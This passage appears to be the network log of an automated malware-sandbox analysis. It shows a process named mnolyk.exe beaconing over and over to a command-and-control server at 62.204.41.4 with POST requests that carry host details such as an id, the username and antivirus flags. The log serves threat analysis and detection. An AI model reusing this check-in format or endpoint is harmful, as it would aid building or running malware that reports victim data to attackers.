                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.648657084 CET | 202 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            130 | 192.168.2.4 | 49825 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:00.530244112 CET | 318 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.595655918 CET | 319 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            131 | 192.168.2.4 | 49826 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:00.765609026 CET | 319 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.831090927 CET | 320 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            132 | 192.168.2.4 | 49827 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:01.010258913 CET | 320 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.074604988 CET | 321 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            133 | 192.168.2.4 | 49828 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:01.248596907 CET | 321 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.326994896 CET | 322 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            134 | 192.168.2.4 | 49829 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:01.495961905 CET | 322 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.558684111 CET | 323 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            135 | 192.168.2.4 | 49830 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:01.731970072 CET | 324 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.797064066 CET | 324 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            136 | 192.168.2.4 | 49831 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:01.970314026 CET | 325 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:02.321962118 CET | 325 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            137 | 192.168.2.4 | 49832 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:02.498157978 CET | 326 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:02.564692020 CET | 326 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            138 | 192.168.2.4 | 49833 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:02.749208927 CET | 327 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:02.814519882 CET | 327 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            139 | 192.168.2.4 | 49834 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:03.045301914 CET | 328 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:03.110811949 CET | 328 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            14 | 192.168.2.4 | 49709 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:27.822242975 CET | 203 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.887223959 CET | 203 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            140 | 192.168.2.4 | 49835 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:03.284885883 CET | 329 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:03.348592043 CET | 329 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            141 | 192.168.2.4 | 49836 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:03.530213118 CET | 330 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:03.594712019 CET | 330 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            142 | 192.168.2.4 | 49837 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:06.766539097 CET | 331 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:06.830897093 CET | 331 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            143 | 192.168.2.4 | 49838 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:06.998531103 CET | 332 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.065126896 CET | 332 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            144 | 192.168.2.4 | 49839 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:07.247674942 CET | 333 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.311855078 CET | 333 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            145 | 192.168.2.4 | 49840 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:07.481729031 CET | 334 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.545599937 CET | 334 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            146 | 192.168.2.4 | 49841 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:07.721676111 CET | 335 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.788988113 CET | 335 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            147 | 192.168.2.4 | 49842 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:07.992649078 CET | 336 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.061883926 CET | 336 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            148 | 192.168.2.4 | 49843 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:08.255379915 CET | 337 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.320699930 CET | 337 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            149 | 192.168.2.4 | 49844 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:08.504141092 CET | 338 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.567250967 CET | 338 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            15 | 192.168.2.4 | 49710 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:28.056200981 CET | 204 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.122034073 CET | 204 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            150 | 192.168.2.4 | 49845 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:08.786241055 CET | 339 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.849670887 CET | 339 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            151 | 192.168.2.4 | 49846 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:09.124319077 CET | 340 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:09.187618971 CET | 340 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            152 | 192.168.2.4 | 49847 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:09.522559881 CET | 341 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:09.584252119 CET | 341 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            153 | 192.168.2.4 | 49848 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:09.783237934 CET | 342 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:09.847910881 CET | 342 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            154 | 192.168.2.4 | 49849 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:10.042740107 CET | 343 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.109348059 CET | 343 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
